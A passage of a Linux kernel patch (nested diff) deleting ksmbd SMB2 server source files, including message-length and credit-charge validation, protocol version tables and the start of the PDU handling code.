+-	if (ret)
+-		return ret;
+-	ksmbd_debug(SMB, "SMB2 data length %u offset %u\n", data_length,
+-		    offset);
+-
+-	if (data_length > 0) {
+-		/*
+-		 * Check to make sure that data area begins after fixed area,
+-		 * Note that last byte of the fixed area is part of data area
+-		 * for some commands, typically those with odd StructureSize,
+-		 * so we must add one to the calculation.
+-		 */
+-		if (offset + 1 < *len) {
+-			ksmbd_debug(SMB,
+-				    "data area offset %d overlaps SMB2 header %u\n",
+-				    offset + 1, *len);
+-			return -EINVAL;
+-		}
+-
+-		*len = offset + data_length;
+-	}
+-
+-calc_size_exit:
+-	ksmbd_debug(SMB, "SMB2 len %u\n", *len);
+-	return 0;
+-}
+-
+-static inline int smb2_query_info_req_len(struct smb2_query_info_req *h)
+-{
+-	return le32_to_cpu(h->InputBufferLength) +
+-		le32_to_cpu(h->OutputBufferLength);
+-}
+-
+-static inline int smb2_set_info_req_len(struct smb2_set_info_req *h)
+-{
+-	return le32_to_cpu(h->BufferLength);
+-}
+-
+-static inline int smb2_read_req_len(struct smb2_read_req *h)
+-{
+-	return le32_to_cpu(h->Length);
+-}
+-
+-static inline int smb2_write_req_len(struct smb2_write_req *h)
+-{
+-	return le32_to_cpu(h->Length);
+-}
+-
+-static inline int smb2_query_dir_req_len(struct smb2_query_directory_req *h)
+-{
+-	return le32_to_cpu(h->OutputBufferLength);
+-}
+-
+-static inline int smb2_ioctl_req_len(struct smb2_ioctl_req *h)
+-{
+-	return le32_to_cpu(h->InputCount) +
+-		le32_to_cpu(h->OutputCount);
+-}
+-
+-static inline int smb2_ioctl_resp_len(struct smb2_ioctl_req *h)
+-{
+-	return le32_to_cpu(h->MaxInputResponse) +
+-		le32_to_cpu(h->MaxOutputResponse);
+-}
+-
+-static int smb2_validate_credit_charge(struct ksmbd_conn *conn,
+-				       struct smb2_hdr *hdr)
+-{
+-	unsigned int req_len = 0, expect_resp_len = 0, calc_credit_num, max_len;
+-	unsigned short credit_charge = le16_to_cpu(hdr->CreditCharge);
+-	void *__hdr = hdr;
+-	int ret = 0;
+-
+-	switch (hdr->Command) {
+-	case SMB2_QUERY_INFO:
+-		req_len = smb2_query_info_req_len(__hdr);
+-		break;
+-	case SMB2_SET_INFO:
+-		req_len = smb2_set_info_req_len(__hdr);
+-		break;
+-	case SMB2_READ:
+-		req_len = smb2_read_req_len(__hdr);
+-		break;
+-	case SMB2_WRITE:
+-		req_len = smb2_write_req_len(__hdr);
+-		break;
+-	case SMB2_QUERY_DIRECTORY:
+-		req_len = smb2_query_dir_req_len(__hdr);
+-		break;
+-	case SMB2_IOCTL:
+-		req_len = smb2_ioctl_req_len(__hdr);
+-		expect_resp_len = smb2_ioctl_resp_len(__hdr);
+-		break;
+-	case SMB2_CANCEL:
+-		return 0;
+-	default:
+-		req_len = 1;
+-		break;
+-	}
+-
+-	credit_charge = max_t(unsigned short, credit_charge, 1);
+-	max_len = max_t(unsigned int, req_len, expect_resp_len);
+-	calc_credit_num = DIV_ROUND_UP(max_len, SMB2_MAX_BUFFER_SIZE);
+-
+-	if (credit_charge < calc_credit_num) {
+-		ksmbd_debug(SMB, "Insufficient credit charge, given: %d, needed: %d\n",
+-			    credit_charge, calc_credit_num);
+-		return 1;
+-	} else if (credit_charge > conn->vals->max_credits) {
+-		ksmbd_debug(SMB, "Too large credit charge: %d\n", credit_charge);
+-		return 1;
+-	}
+-
+-	spin_lock(&conn->credits_lock);
+-	if (credit_charge > conn->total_credits) {
+-		ksmbd_debug(SMB, "Insufficient credits granted, given: %u, granted: %u\n",
+-			    credit_charge, conn->total_credits);
+-		ret = 1;
+-	}
+-
+-	if ((u64)conn->outstanding_credits + credit_charge > conn->total_credits) {
+-		ksmbd_debug(SMB, "Limits exceeding the maximum allowable outstanding requests, given : %u, pending : %u\n",
+-			    credit_charge, conn->outstanding_credits);
+-		ret = 1;
+-	} else
+-		conn->outstanding_credits += credit_charge;
+-
+-	spin_unlock(&conn->credits_lock);
+-
+-	return ret;
+-}
+-
+-int ksmbd_smb2_check_message(struct ksmbd_work *work)
+-{
+-	struct smb2_pdu *pdu = ksmbd_req_buf_next(work);
+-	struct smb2_hdr *hdr = &pdu->hdr;
+-	int command;
+-	__u32 clc_len;  /* calculated length */
+-	__u32 len = get_rfc1002_len(work->request_buf);
+-
+-	if (le32_to_cpu(hdr->NextCommand) > 0)
+-		len = le32_to_cpu(hdr->NextCommand);
+-	else if (work->next_smb2_rcv_hdr_off)
+-		len -= work->next_smb2_rcv_hdr_off;
+-
+-	if (check_smb2_hdr(hdr))
+-		return 1;
+-
+-	if (hdr->StructureSize != SMB2_HEADER_STRUCTURE_SIZE) {
+-		ksmbd_debug(SMB, "Illegal structure size %u\n",
+-			    le16_to_cpu(hdr->StructureSize));
+-		return 1;
+-	}
+-
+-	command = le16_to_cpu(hdr->Command);
+-	if (command >= NUMBER_OF_SMB2_COMMANDS) {
+-		ksmbd_debug(SMB, "Illegal SMB2 command %d\n", command);
+-		return 1;
+-	}
+-
+-	if (smb2_req_struct_sizes[command] != pdu->StructureSize2) {
+-		if (command != SMB2_OPLOCK_BREAK_HE &&
+-		    (hdr->Status == 0 || pdu->StructureSize2 != SMB2_ERROR_STRUCTURE_SIZE2_LE)) {
+-			/* error packets have 9 byte structure size */
+-			ksmbd_debug(SMB,
+-				    "Illegal request size %u for command %d\n",
+-				    le16_to_cpu(pdu->StructureSize2), command);
+-			return 1;
+-		} else if (command == SMB2_OPLOCK_BREAK_HE &&
+-			   hdr->Status == 0 &&
+-			   le16_to_cpu(pdu->StructureSize2) != OP_BREAK_STRUCT_SIZE_20 &&
+-			   le16_to_cpu(pdu->StructureSize2) != OP_BREAK_STRUCT_SIZE_21) {
+-			/* special case for SMB2.1 lease break message */
+-			ksmbd_debug(SMB,
+-				    "Illegal request size %d for oplock break\n",
+-				    le16_to_cpu(pdu->StructureSize2));
+-			return 1;
+-		}
+-	}
+-
+-	if (smb2_calc_size(hdr, &clc_len))
+-		return 1;
+-
+-	if (len != clc_len) {
+-		/* client can return one byte more due to implied bcc[0] */
+-		if (clc_len == len + 1)
+-			goto validate_credit;
+-
+-		/*
+-		 * Some windows servers (win2016) will pad also the final
+-		 * PDU in a compound to 8 bytes.
+-		 */
+-		if (ALIGN(clc_len, 8) == len)
+-			goto validate_credit;
+-
+-		/*
+-		 * SMB2 NEGOTIATE request will be validated when message
+-		 * handling proceeds.
+-		 */
+-		if (command == SMB2_NEGOTIATE_HE)
+-			goto validate_credit;
+-
+-		/*
+-		 * Allow a message that padded to 8byte boundary.
+-		 * Linux 4.19.217 with smb 3.0.2 are sometimes
+-		 * sending messages where the cls_len is exactly
+-		 * 8 bytes less than len.
+-		 */
+-		if (clc_len < len && (len - clc_len) <= 8)
+-			goto validate_credit;
+-
+-		pr_err_ratelimited(
+-			    "cli req too short, len %d not %d. cmd:%d mid:%llu\n",
+-			    len, clc_len, command,
+-			    le64_to_cpu(hdr->MessageId));
+-
+-		return 1;
+-	}
+-
+-validate_credit:
+-	if ((work->conn->vals->capabilities & SMB2_GLOBAL_CAP_LARGE_MTU) &&
+-	    smb2_validate_credit_charge(work->conn, hdr)) {
+-		work->conn->ops->set_rsp_status(work, STATUS_INVALID_PARAMETER);
+-		return 1;
+-	}
+-
+-	return 0;
+-}
+-
+-int smb2_negotiate_request(struct ksmbd_work *work)
+-{
+-	return ksmbd_smb_negotiate_common(work, SMB2_NEGOTIATE_HE);
+-}
+diff --git a/fs/ksmbd/smb2ops.c b/fs/ksmbd/smb2ops.c
+deleted file mode 100644
+index ab23da2120b94..0000000000000
+--- a/fs/ksmbd/smb2ops.c
++++ /dev/null
+@@ -1,314 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#include <linux/slab.h>
+-#include "glob.h"
+-
+-#include "auth.h"
+-#include "connection.h"
+-#include "smb_common.h"
+-#include "server.h"
+-
+-static struct smb_version_values smb21_server_values = {
+-	.version_string = SMB21_VERSION_STRING,
+-	.protocol_id = SMB21_PROT_ID,
+-	.capabilities = SMB2_GLOBAL_CAP_LARGE_MTU,
+-	.max_read_size = SMB21_DEFAULT_IOSIZE,
+-	.max_write_size = SMB21_DEFAULT_IOSIZE,
+-	.max_trans_size = SMB21_DEFAULT_IOSIZE,
+-	.max_credits = SMB2_MAX_CREDITS,
+-	.large_lock_type = 0,
+-	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
+-	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
+-	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
+-	.header_size = sizeof(struct smb2_hdr),
+-	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
+-	.lock_cmd = SMB2_LOCK,
+-	.cap_unix = 0,
+-	.cap_nt_find = SMB2_NT_FIND,
+-	.cap_large_files = SMB2_LARGE_FILES,
+-	.create_lease_size = sizeof(struct create_lease),
+-	.create_durable_size = sizeof(struct create_durable_rsp),
+-	.create_mxac_size = sizeof(struct create_mxac_rsp),
+-	.create_disk_id_size = sizeof(struct create_disk_id_rsp),
+-	.create_posix_size = sizeof(struct create_posix_rsp),
+-};
+-
+-static struct smb_version_values smb30_server_values = {
+-	.version_string = SMB30_VERSION_STRING,
+-	.protocol_id = SMB30_PROT_ID,
+-	.capabilities = SMB2_GLOBAL_CAP_LARGE_MTU,
+-	.max_read_size = SMB3_DEFAULT_IOSIZE,
+-	.max_write_size = SMB3_DEFAULT_IOSIZE,
+-	.max_trans_size = SMB3_DEFAULT_TRANS_SIZE,
+-	.max_credits = SMB2_MAX_CREDITS,
+-	.large_lock_type = 0,
+-	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
+-	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
+-	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
+-	.header_size = sizeof(struct smb2_hdr),
+-	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
+-	.lock_cmd = SMB2_LOCK,
+-	.cap_unix = 0,
+-	.cap_nt_find = SMB2_NT_FIND,
+-	.cap_large_files = SMB2_LARGE_FILES,
+-	.create_lease_size = sizeof(struct create_lease_v2),
+-	.create_durable_size = sizeof(struct create_durable_rsp),
+-	.create_durable_v2_size = sizeof(struct create_durable_v2_rsp),
+-	.create_mxac_size = sizeof(struct create_mxac_rsp),
+-	.create_disk_id_size = sizeof(struct create_disk_id_rsp),
+-	.create_posix_size = sizeof(struct create_posix_rsp),
+-};
+-
+-static struct smb_version_values smb302_server_values = {
+-	.version_string = SMB302_VERSION_STRING,
+-	.protocol_id = SMB302_PROT_ID,
+-	.capabilities = SMB2_GLOBAL_CAP_LARGE_MTU,
+-	.max_read_size = SMB3_DEFAULT_IOSIZE,
+-	.max_write_size = SMB3_DEFAULT_IOSIZE,
+-	.max_trans_size = SMB3_DEFAULT_TRANS_SIZE,
+-	.max_credits = SMB2_MAX_CREDITS,
+-	.large_lock_type = 0,
+-	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
+-	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
+-	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
+-	.header_size = sizeof(struct smb2_hdr),
+-	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
+-	.lock_cmd = SMB2_LOCK,
+-	.cap_unix = 0,
+-	.cap_nt_find = SMB2_NT_FIND,
+-	.cap_large_files = SMB2_LARGE_FILES,
+-	.create_lease_size = sizeof(struct create_lease_v2),
+-	.create_durable_size = sizeof(struct create_durable_rsp),
+-	.create_durable_v2_size = sizeof(struct create_durable_v2_rsp),
+-	.create_mxac_size = sizeof(struct create_mxac_rsp),
+-	.create_disk_id_size = sizeof(struct create_disk_id_rsp),
+-	.create_posix_size = sizeof(struct create_posix_rsp),
+-};
+-
+-static struct smb_version_values smb311_server_values = {
+-	.version_string = SMB311_VERSION_STRING,
+-	.protocol_id = SMB311_PROT_ID,
+-	.capabilities = SMB2_GLOBAL_CAP_LARGE_MTU,
+-	.max_read_size = SMB3_DEFAULT_IOSIZE,
+-	.max_write_size = SMB3_DEFAULT_IOSIZE,
+-	.max_trans_size = SMB3_DEFAULT_TRANS_SIZE,
+-	.max_credits = SMB2_MAX_CREDITS,
+-	.large_lock_type = 0,
+-	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
+-	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
+-	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
+-	.header_size = sizeof(struct smb2_hdr),
+-	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
+-	.lock_cmd = SMB2_LOCK,
+-	.cap_unix = 0,
+-	.cap_nt_find = SMB2_NT_FIND,
+-	.cap_large_files = SMB2_LARGE_FILES,
+-	.create_lease_size = sizeof(struct create_lease_v2),
+-	.create_durable_size = sizeof(struct create_durable_rsp),
+-	.create_durable_v2_size = sizeof(struct create_durable_v2_rsp),
+-	.create_mxac_size = sizeof(struct create_mxac_rsp),
+-	.create_disk_id_size = sizeof(struct create_disk_id_rsp),
+-	.create_posix_size = sizeof(struct create_posix_rsp),
+-};
+-
+-static struct smb_version_ops smb2_0_server_ops = {
+-	.get_cmd_val		=	get_smb2_cmd_val,
+-	.init_rsp_hdr		=	init_smb2_rsp_hdr,
+-	.set_rsp_status		=	set_smb2_rsp_status,
+-	.allocate_rsp_buf       =       smb2_allocate_rsp_buf,
+-	.set_rsp_credits	=	smb2_set_rsp_credits,
+-	.check_user_session	=	smb2_check_user_session,
+-	.get_ksmbd_tcon		=	smb2_get_ksmbd_tcon,
+-	.is_sign_req		=	smb2_is_sign_req,
+-	.check_sign_req		=	smb2_check_sign_req,
+-	.set_sign_rsp		=	smb2_set_sign_rsp
+-};
+-
+-static struct smb_version_ops smb3_0_server_ops = {
+-	.get_cmd_val		=	get_smb2_cmd_val,
+-	.init_rsp_hdr		=	init_smb2_rsp_hdr,
+-	.set_rsp_status		=	set_smb2_rsp_status,
+-	.allocate_rsp_buf       =       smb2_allocate_rsp_buf,
+-	.set_rsp_credits	=	smb2_set_rsp_credits,
+-	.check_user_session	=	smb2_check_user_session,
+-	.get_ksmbd_tcon		=	smb2_get_ksmbd_tcon,
+-	.is_sign_req		=	smb2_is_sign_req,
+-	.check_sign_req		=	smb3_check_sign_req,
+-	.set_sign_rsp		=	smb3_set_sign_rsp,
+-	.generate_signingkey	=	ksmbd_gen_smb30_signingkey,
+-	.generate_encryptionkey	=	ksmbd_gen_smb30_encryptionkey,
+-	.is_transform_hdr	=	smb3_is_transform_hdr,
+-	.decrypt_req		=	smb3_decrypt_req,
+-	.encrypt_resp		=	smb3_encrypt_resp
+-};
+-
+-static struct smb_version_ops smb3_11_server_ops = {
+-	.get_cmd_val		=	get_smb2_cmd_val,
+-	.init_rsp_hdr		=	init_smb2_rsp_hdr,
+-	.set_rsp_status		=	set_smb2_rsp_status,
+-	.allocate_rsp_buf       =       smb2_allocate_rsp_buf,
+-	.set_rsp_credits	=	smb2_set_rsp_credits,
+-	.check_user_session	=	smb2_check_user_session,
+-	.get_ksmbd_tcon		=	smb2_get_ksmbd_tcon,
+-	.is_sign_req		=	smb2_is_sign_req,
+-	.check_sign_req		=	smb3_check_sign_req,
+-	.set_sign_rsp		=	smb3_set_sign_rsp,
+-	.generate_signingkey	=	ksmbd_gen_smb311_signingkey,
+-	.generate_encryptionkey	=	ksmbd_gen_smb311_encryptionkey,
+-	.is_transform_hdr	=	smb3_is_transform_hdr,
+-	.decrypt_req		=	smb3_decrypt_req,
+-	.encrypt_resp		=	smb3_encrypt_resp
+-};
+-
+-static struct smb_version_cmds smb2_0_server_cmds[NUMBER_OF_SMB2_COMMANDS] = {
+-	[SMB2_NEGOTIATE_HE]	=	{ .proc = smb2_negotiate_request, },
+-	[SMB2_SESSION_SETUP_HE] =	{ .proc = smb2_sess_setup, },
+-	[SMB2_TREE_CONNECT_HE]  =	{ .proc = smb2_tree_connect,},
+-	[SMB2_TREE_DISCONNECT_HE]  =	{ .proc = smb2_tree_disconnect,},
+-	[SMB2_LOGOFF_HE]	=	{ .proc = smb2_session_logoff,},
+-	[SMB2_CREATE_HE]	=	{ .proc = smb2_open},
+-	[SMB2_QUERY_INFO_HE]	=	{ .proc = smb2_query_info},
+-	[SMB2_QUERY_DIRECTORY_HE] =	{ .proc = smb2_query_dir},
+-	[SMB2_CLOSE_HE]		=	{ .proc = smb2_close},
+-	[SMB2_ECHO_HE]		=	{ .proc = smb2_echo},
+-	[SMB2_SET_INFO_HE]      =       { .proc = smb2_set_info},
+-	[SMB2_READ_HE]		=	{ .proc = smb2_read},
+-	[SMB2_WRITE_HE]		=	{ .proc = smb2_write},
+-	[SMB2_FLUSH_HE]		=	{ .proc = smb2_flush},
+-	[SMB2_CANCEL_HE]	=	{ .proc = smb2_cancel},
+-	[SMB2_LOCK_HE]		=	{ .proc = smb2_lock},
+-	[SMB2_IOCTL_HE]		=	{ .proc = smb2_ioctl},
+-	[SMB2_OPLOCK_BREAK_HE]	=	{ .proc = smb2_oplock_break},
+-	[SMB2_CHANGE_NOTIFY_HE]	=	{ .proc = smb2_notify},
+-};
+-
+-/**
+- * init_smb2_1_server() - initialize a smb server connection with smb2.1
+- *			command dispatcher
+- * @conn:	connection instance
+- */
+-void init_smb2_1_server(struct ksmbd_conn *conn)
+-{
+-	conn->vals = &smb21_server_values;
+-	conn->ops = &smb2_0_server_ops;
+-	conn->cmds = smb2_0_server_cmds;
+-	conn->max_cmds = ARRAY_SIZE(smb2_0_server_cmds);
+-	conn->signing_algorithm = SIGNING_ALG_HMAC_SHA256_LE;
+-
+-	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_LEASES)
+-		conn->vals->capabilities |= SMB2_GLOBAL_CAP_LEASING;
+-}
+-
+-/**
+- * init_smb3_0_server() - initialize a smb server connection with smb3.0
+- *			command dispatcher
+- * @conn:	connection instance
+- */
+-void init_smb3_0_server(struct ksmbd_conn *conn)
+-{
+-	conn->vals = &smb30_server_values;
+-	conn->ops = &smb3_0_server_ops;
+-	conn->cmds = smb2_0_server_cmds;
+-	conn->max_cmds = ARRAY_SIZE(smb2_0_server_cmds);
+-	conn->signing_algorithm = SIGNING_ALG_AES_CMAC_LE;
+-
+-	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_LEASES)
+-		conn->vals->capabilities |= SMB2_GLOBAL_CAP_LEASING;
+-
+-	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION &&
+-	    conn->cli_cap & SMB2_GLOBAL_CAP_ENCRYPTION)
+-		conn->vals->capabilities |= SMB2_GLOBAL_CAP_ENCRYPTION;
+-
+-	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL)
+-		conn->vals->capabilities |= SMB2_GLOBAL_CAP_MULTI_CHANNEL;
+-}
+-
+-/**
+- * init_smb3_02_server() - initialize a smb server connection with smb3.02
+- *			command dispatcher
+- * @conn:	connection instance
+- */
+-void init_smb3_02_server(struct ksmbd_conn *conn)
+-{
+-	conn->vals = &smb302_server_values;
+-	conn->ops = &smb3_0_server_ops;
+-	conn->cmds = smb2_0_server_cmds;
+-	conn->max_cmds = ARRAY_SIZE(smb2_0_server_cmds);
+-	conn->signing_algorithm = SIGNING_ALG_AES_CMAC_LE;
+-
+-	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_LEASES)
+-		conn->vals->capabilities |= SMB2_GLOBAL_CAP_LEASING;
+-
+-	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION &&
+-	    conn->cli_cap & SMB2_GLOBAL_CAP_ENCRYPTION)
+-		conn->vals->capabilities |= SMB2_GLOBAL_CAP_ENCRYPTION;
+-
+-	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL)
+-		conn->vals->capabilities |= SMB2_GLOBAL_CAP_MULTI_CHANNEL;
+-}
+-
+-/**
+- * init_smb3_11_server() - initialize a smb server connection with smb3.11
+- *			command dispatcher
+- * @conn:	connection instance
+- */
+-int init_smb3_11_server(struct ksmbd_conn *conn)
+-{
+-	conn->vals = &smb311_server_values;
+-	conn->ops = &smb3_11_server_ops;
+-	conn->cmds = smb2_0_server_cmds;
+-	conn->max_cmds = ARRAY_SIZE(smb2_0_server_cmds);
+-	conn->signing_algorithm = SIGNING_ALG_AES_CMAC_LE;
+-
+-	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_LEASES)
+-		conn->vals->capabilities |= SMB2_GLOBAL_CAP_LEASING;
+-
+-	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL)
+-		conn->vals->capabilities |= SMB2_GLOBAL_CAP_MULTI_CHANNEL;
+-
+-	INIT_LIST_HEAD(&conn->preauth_sess_table);
+-	return 0;
+-}
+-
+-void init_smb2_max_read_size(unsigned int sz)
+-{
+-	sz = clamp_val(sz, SMB3_MIN_IOSIZE, SMB3_MAX_IOSIZE);
+-	smb21_server_values.max_read_size = sz;
+-	smb30_server_values.max_read_size = sz;
+-	smb302_server_values.max_read_size = sz;
+-	smb311_server_values.max_read_size = sz;
+-}
+-
+-void init_smb2_max_write_size(unsigned int sz)
+-{
+-	sz = clamp_val(sz, SMB3_MIN_IOSIZE, SMB3_MAX_IOSIZE);
+-	smb21_server_values.max_write_size = sz;
+-	smb30_server_values.max_write_size = sz;
+-	smb302_server_values.max_write_size = sz;
+-	smb311_server_values.max_write_size = sz;
+-}
+-
+-void init_smb2_max_trans_size(unsigned int sz)
+-{
+-	sz = clamp_val(sz, SMB3_MIN_IOSIZE, SMB3_MAX_IOSIZE);
+-	smb21_server_values.max_trans_size = sz;
+-	smb30_server_values.max_trans_size = sz;
+-	smb302_server_values.max_trans_size = sz;
+-	smb311_server_values.max_trans_size = sz;
+-}
+-
+-void init_smb2_max_credits(unsigned int sz)
+-{
+-	smb21_server_values.max_credits = sz;
+-	smb30_server_values.max_credits = sz;
+-	smb302_server_values.max_credits = sz;
+-	smb311_server_values.max_credits = sz;
+-}
+diff --git a/fs/ksmbd/smb2pdu.c b/fs/ksmbd/smb2pdu.c
+deleted file mode 100644
+index 56f661e5ef628..0000000000000
+--- a/fs/ksmbd/smb2pdu.c
++++ /dev/null
+@@ -1,8693 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#include <linux/inetdevice.h>
+-#include <net/addrconf.h>
+-#include <linux/syscalls.h>
+-#include <linux/namei.h>
+-#include <linux/statfs.h>
+-#include <linux/ethtool.h>
+-#include <linux/falloc.h>
+-#include <linux/mount.h>
+-
+-#include "glob.h"
+-#include "smbfsctl.h"
+-#include "oplock.h"
+-#include "smbacl.h"
+-
+-#include "auth.h"
+-#include "asn1.h"
+-#include "connection.h"
+-#include "transport_ipc.h"
+-#include "transport_rdma.h"
+-#include "vfs.h"
+-#include "vfs_cache.h"
+-#include "misc.h"
+-
+-#include "server.h"
+-#include "smb_common.h"
+-#include "smbstatus.h"
+-#include "ksmbd_work.h"
+-#include "mgmt/user_config.h"
+-#include "mgmt/share_config.h"
+-#include "mgmt/tree_connect.h"
+-#include "mgmt/user_session.h"
+-#include "mgmt/ksmbd_ida.h"
+-#include "ndr.h"
+-
+-static void __wbuf(struct ksmbd_work *work, void **req, void **rsp)
+-{
+-	if (work->next_smb2_rcv_hdr_off) {
+-		*req = ksmbd_req_buf_next(work);
+-		*rsp = ksmbd_resp_buf_next(work);
+-	} else {
+-		*req = smb2_get_msg(work->request_buf);
+-		*rsp = smb2_get_msg(work->response_buf);
+-	}
+-}
+-
+-#define WORK_BUFFERS(w, rq, rs)	__wbuf((w), (void **)&(rq), (void **)&(rs))
+-
+-/**
+- * check_session_id() - check for valid session id in smb header
+- * @conn:	connection instance
+- * @id:		session id from smb header
+- *
+- * Return:      1 if valid session id, otherwise 0
+- */
+-static inline bool check_session_id(struct ksmbd_conn *conn, u64 id)
+-{
+-	struct ksmbd_session *sess;
+-
+-	if (id == 0 || id == -1)
+-		return false;
+-
+-	sess = ksmbd_session_lookup_all(conn, id);
+-	if (sess)
+-		return true;
+-	pr_err("Invalid user session id: %llu\n", id);
+-	return false;
+-}
+-
+-struct channel *lookup_chann_list(struct ksmbd_session *sess, struct ksmbd_conn *conn)
+-{
+-	return xa_load(&sess->ksmbd_chann_list, (long)conn);
+-}
+-
+-/**
+- * smb2_get_ksmbd_tcon() - get tree connection information using a tree id.
+- * @work:	smb work
+- *
+- * Return:	0 if there is a tree connection matched or these are
+- *		skipable commands, otherwise error
+- */
+-int smb2_get_ksmbd_tcon(struct ksmbd_work *work)
+-{
+-	struct smb2_hdr *req_hdr = smb2_get_msg(work->request_buf);
+-	unsigned int cmd = le16_to_cpu(req_hdr->Command);
+-	int tree_id;
+-
+-	work->tcon = NULL;
+-	if (cmd == SMB2_TREE_CONNECT_HE ||
+-	    cmd ==  SMB2_CANCEL_HE ||
+-	    cmd ==  SMB2_LOGOFF_HE) {
+-		ksmbd_debug(SMB, "skip to check tree connect request\n");
+-		return 0;
+-	}
+-
+-	if (xa_empty(&work->sess->tree_conns)) {
+-		ksmbd_debug(SMB, "NO tree connected\n");
+-		return -ENOENT;
+-	}
+-
+-	tree_id = le32_to_cpu(req_hdr->Id.SyncId.TreeId);
+-	work->tcon = ksmbd_tree_conn_lookup(work->sess, tree_id);
+-	if (!work->tcon) {
+-		pr_err("Invalid tid %d\n", tree_id);
+-		return -EINVAL;
+-	}
+-
+-	return 1;
+-}
+-
+-/**
+- * smb2_set_err_rsp() - set error response code on smb response
+- * @work:	smb work containing response buffer
+- */
+-void smb2_set_err_rsp(struct ksmbd_work *work)
+-{
+-	struct smb2_err_rsp *err_rsp;
+-
+-	if (work->next_smb2_rcv_hdr_off)
+-		err_rsp = ksmbd_resp_buf_next(work);
+-	else
+-		err_rsp = smb2_get_msg(work->response_buf);
+-
+-	if (err_rsp->hdr.Status != STATUS_STOPPED_ON_SYMLINK) {
+-		err_rsp->StructureSize = SMB2_ERROR_STRUCTURE_SIZE2_LE;
+-		err_rsp->ErrorContextCount = 0;
+-		err_rsp->Reserved = 0;
+-		err_rsp->ByteCount = 0;
+-		err_rsp->ErrorData[0] = 0;
+-		inc_rfc1001_len(work->response_buf, SMB2_ERROR_STRUCTURE_SIZE2);
+-	}
+-}
+-
+-/**
+- * is_smb2_neg_cmd() - is it smb2 negotiation command
+- * @work:	smb work containing smb header
+- *
+- * Return:      true if smb2 negotiation command, otherwise false
+- */
+-bool is_smb2_neg_cmd(struct ksmbd_work *work)
+-{
+-	struct smb2_hdr *hdr = smb2_get_msg(work->request_buf);
+-
+-	/* is it SMB2 header ? */
+-	if (hdr->ProtocolId != SMB2_PROTO_NUMBER)
+-		return false;
+-
+-	/* make sure it is request not response message */
+-	if (hdr->Flags & SMB2_FLAGS_SERVER_TO_REDIR)
+-		return false;
+-
+-	if (hdr->Command != SMB2_NEGOTIATE)
+-		return false;
+-
+-	return true;
+-}
+-
+-/**
+- * is_smb2_rsp() - is it smb2 response
+- * @work:	smb work containing smb response buffer
+- *
+- * Return:      true if smb2 response, otherwise false
+- */
+-bool is_smb2_rsp(struct ksmbd_work *work)
+-{
+-	struct smb2_hdr *hdr = smb2_get_msg(work->response_buf);
+-
+-	/* is it SMB2 header ? */
+-	if (hdr->ProtocolId != SMB2_PROTO_NUMBER)
+-		return false;
+-
+-	/* make sure it is response not request message */
+-	if (!(hdr->Flags & SMB2_FLAGS_SERVER_TO_REDIR))
+-		return false;
+-
+-	return true;
+-}
+-
+-/**
+- * get_smb2_cmd_val() - get smb command code from smb header
+- * @work:	smb work containing smb request buffer
+- *
+- * Return:      smb2 request command value
+- */
+-u16 get_smb2_cmd_val(struct ksmbd_work *work)
+-{
+-	struct smb2_hdr *rcv_hdr;
+-
+-	if (work->next_smb2_rcv_hdr_off)
+-		rcv_hdr = ksmbd_req_buf_next(work);
+-	else
+-		rcv_hdr = smb2_get_msg(work->request_buf);
+-	return le16_to_cpu(rcv_hdr->Command);
+-}
+-
+-/**
+- * set_smb2_rsp_status() - set error response code on smb2 header
+- * @work:	smb work containing response buffer
+- * @err:	error response code
+- */
+-void set_smb2_rsp_status(struct ksmbd_work *work, __le32 err)
+-{
+-	struct smb2_hdr *rsp_hdr;
+-
+-	if (work->next_smb2_rcv_hdr_off)
+-		rsp_hdr = ksmbd_resp_buf_next(work);
+-	else
+-		rsp_hdr = smb2_get_msg(work->response_buf);
+-	rsp_hdr->Status = err;
+-	smb2_set_err_rsp(work);
+-}
+-
+-/**
+- * init_smb2_neg_rsp() - initialize smb2 response for negotiate command
+- * @work:	smb work containing smb request buffer
+- *
+- * smb2 negotiate response is sent in reply of smb1 negotiate command for
+- * dialect auto-negotiation.
+- */
+-int init_smb2_neg_rsp(struct ksmbd_work *work)
+-{
+-	struct smb2_hdr *rsp_hdr;
+-	struct smb2_negotiate_rsp *rsp;
+-	struct ksmbd_conn *conn = work->conn;
+-
+-	*(__be32 *)work->response_buf =
+-		cpu_to_be32(conn->vals->header_size);
+-
+-	rsp_hdr = smb2_get_msg(work->response_buf);
